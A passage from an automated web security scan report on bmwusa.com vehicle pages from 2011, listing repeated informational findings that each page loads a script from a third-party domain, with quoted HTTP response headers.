<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.230. http://www.bmwusa.com/standard/content/vehicles/2011/x3/x3savexplore.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/x3savexplore.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:31 GMT;path=/
Content-Length: 179601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.231. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:09 GMT;path=/
Content-Length: 211880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.232. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:37:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:57:47 GMT;path=/
Content-Length: 211881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.233. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:39:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:59:39 GMT;path=/
Content-Length: 224196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.234. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:41 GMT;path=/
Content-Length: 224197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.235. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:25 GMT;path=/
Content-Length: 239128

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.236. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:15 GMT;path=/
Content-Length: 239129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.237. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:40:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:00:49 GMT;path=/
Content-Length: 201680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.238. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive28i/x3seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:38:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:58:34 GMT;path=/
Content-Length: 201681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.239. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:45:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:05:37 GMT;path=/
Content-Length: 212054

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.240. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:41:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:01:50 GMT;path=/
Content-Length: 212055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.241. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:35 GMT;path=/
Content-Length: 224831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.242. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/features_and_specs/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:44:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:04:31 GMT;path=/
Content-Length: 224832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.243. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:19 GMT;path=/
Content-Length: 239217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.244. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/modelhighlights/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:42:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:02:07 GMT;path=/
Content-Length: 239218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.245. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:21 GMT;path=/
Content-Length: 201679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.246. http://www.bmwusa.com/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x3/xdrive35i/x3seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:43:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:03:00 GMT;path=/
Content-Length: 201680

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.247. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:57:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:17:43 GMT;path=/
Content-Length: 199801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.248. http://www.bmwusa.com/standard/content/vehicles/2011/x5/default.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:31 GMT;path=/
Content-Length: 199802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.249. http://www.bmwusa.com/standard/content/vehicles/2011/x5/x5savexplorenew.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/x5savexplorenew.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:45 GMT;path=/
Content-Length: 180315

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.250. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:21 GMT;path=/
Content-Length: 214470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.251. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:04 GMT;path=/
Content-Length: 224849

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.252. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:37 GMT;path=/
Content-Length: 214642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.253. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:54:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:14:20 GMT;path=/
Content-Length: 202223

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.254. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35d/x5seriessavmediagallery.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:53:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:13:42 GMT;path=/
Content-Length: 202224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.255. http://www.bmwusa.com/standard/content/vehicles/2011/x5/xdrive35i/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bmwusa.com
Path:	/standard/content/vehicles/2011/x5/xdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://com-bmwusa.netmng.com/

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:06:55 GMT;path=/
Content-Length: 214350

